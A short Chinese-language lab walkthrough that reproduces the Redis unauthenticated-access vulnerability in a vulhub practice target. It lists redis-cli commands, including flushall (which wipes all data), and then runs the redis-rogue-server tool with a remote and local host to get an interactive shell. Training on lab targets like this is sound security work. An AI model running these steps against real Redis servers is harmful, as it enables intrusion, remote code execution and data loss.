Bootstrap

Redis漏洞复现【vulhub靶场】

步骤一:打开靶场

进入目录:cd /vulhub-master/redis/4-unacc

启动:docker-compose up -d

检查:docker-compose ps

步骤二:打开kali在kali安装redis程序

#安装redis
apt-get install redis
#redis链接
redis-cli -h 192.168.4.176-p 6379#redis常见命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
3)刷新数据库:flushdb
看所有键:KEYS *,使用select num可以查看键值数据。5设置变量:set test“whoami"
6config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称

实例如下

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞..下载以下攻击项目.

git clone https://github.com/n0b0dyCN/redis-rogue-server

步骤四:使用Python命令通过Redis程序进行连接

python3 redis-rogue-server.py --rhost 192.168.189.150 --lhost 172.16.1.65

然后输入i进入交互即可,即可连接成功。

;